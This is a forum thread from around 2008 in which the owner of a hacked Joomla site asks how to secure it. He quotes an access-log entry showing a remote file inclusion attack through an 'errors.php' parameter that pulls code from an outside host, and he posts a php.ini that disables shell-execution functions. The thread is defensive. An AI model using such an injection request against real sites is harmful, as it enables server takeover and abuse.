0
Welcome Guest! Login
2 items / $48.00 Checkout

How do I stop the hackers??

Last Post
Search Topic

  • How do I stop the hackers??

    Posted 15 years 9 months ago
    • Hi

      Does anybody have any ideas how I can stop a website from being hacked? It's seems that every man and his mother can walk onto the webspace and drop whatever they want on me! The latest was someody who decided to rip a Italian DVD onto the space and leave it for all his wee friends to come along and upload.

      Once I pointed out to my hosting company that I have no interest in Italian DVDs, they promptly removed it and advised how they site was hacked.

      On the logs, it showed

      xxxxxx.co.uk 21x.1x1.6x.18x - - [16/Jul/2008:05:57:02 +0100] "GET /errors.php?error=http://xxxxxx.com/cms/test.txt?? HTTP/1.1" 200 1229 "-" "Mozilla/4.61 (Macintosh; I; PPC)"

      Looks like someone was able to inject a shell through the 'error' variable, but for the life of me I do not know how I'm suppose to lock "errors.php" down to stop any more intruders....or which errors.php for that matter!

      My php.ini file is looking like this at the moment...

      memory_limit = 32m
      max_exectution_time = 3600
      allow_url_fopen = Off
      allow_url_fopen = 0
      register_globals = Off
      register_globals = 0
      disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open
      magic_quotes_gpc = 1
      magic_quotes_gpc = On
      safe_mode = 1
      safe_mode = On


      Can anybody offer any guidance as to what else I can add to php.ini or how I can lock down errors.php so that nobody else can walk onto this webspace and leave their rubbish behind.

      The website is built around Bentobox template on Joomla 1.0.15, with JCE and Xplorer as the only obvious additions.

      My host is monitoring the site for me but I'd rather just lock everything down and not have to worry about it!

      Any guidance or info appreciated!

      Thanks

      Kevin
    #202957

  • Re: How do I stop the hackers??

    Posted 15 years 9 months ago
    • I can honestly tell you that this isn't a template issue but an issue with Joomla, and more so the configuration which your hosting provider have for php.
      I'm a rookie when it comes to php, but I can say check that your hosting provider is running PHP5, and also check that your site meets Joomla's guidelines for the optimum php settings.
      You'll probably get some far better advice if you asked this question in the www.joomla.org forum, as there are probably others who have had this same problem.
    • Debug Bar - for IE ¦ Firebug - for FireFox

      In the end you will only be remembered for what you have done with the time that you have had.
    #204109

  • Re: How do I stop the hackers??

    Posted 15 years 9 months ago
    #204240

  • Re: How do I stop the hackers??

    Posted 15 years 9 months ago
    • Cardin & Mike

      Sorry for not replying earlier - for some reason I didn't get notified that anybody had replied to my post.

      My hoster is running PHP5 and it complies nicely with Joomla expectations...however the php.ini is standard as in it's blank!
      The php.ini file I'm now using is from the link that Mike provided...like him, I ended up there the first time I was hacked! Reading through that section, it's a real eye-opener to the things I was NOT doing after I have installed Joomla, be it from a clean install or from a Rocketlauncher install. I would recommend any Joomla user go there and check it out!

      The php.ini I have looks pretty sound to me but I'm no expert!! I was told that the latest hack was via "errors.php" and I have no idea if that is something I can lock down with php.ini or is it something more involved that I need to look into.

      Of course I could go to Joomla.org and ask this question...but I'm asking here because the solution to my problem may help other users of RocketTheme who get hacked...or who want to avoid that wee bit of pleasure!

      I'm going to go over to the Joomla secuirty link again to see if I've missed anything but if anybody knows anything about locking down errors.php please let me know!

      Cheers for now

      Kevin
      Inverness
    #205100

Time to create page: 0.040 seconds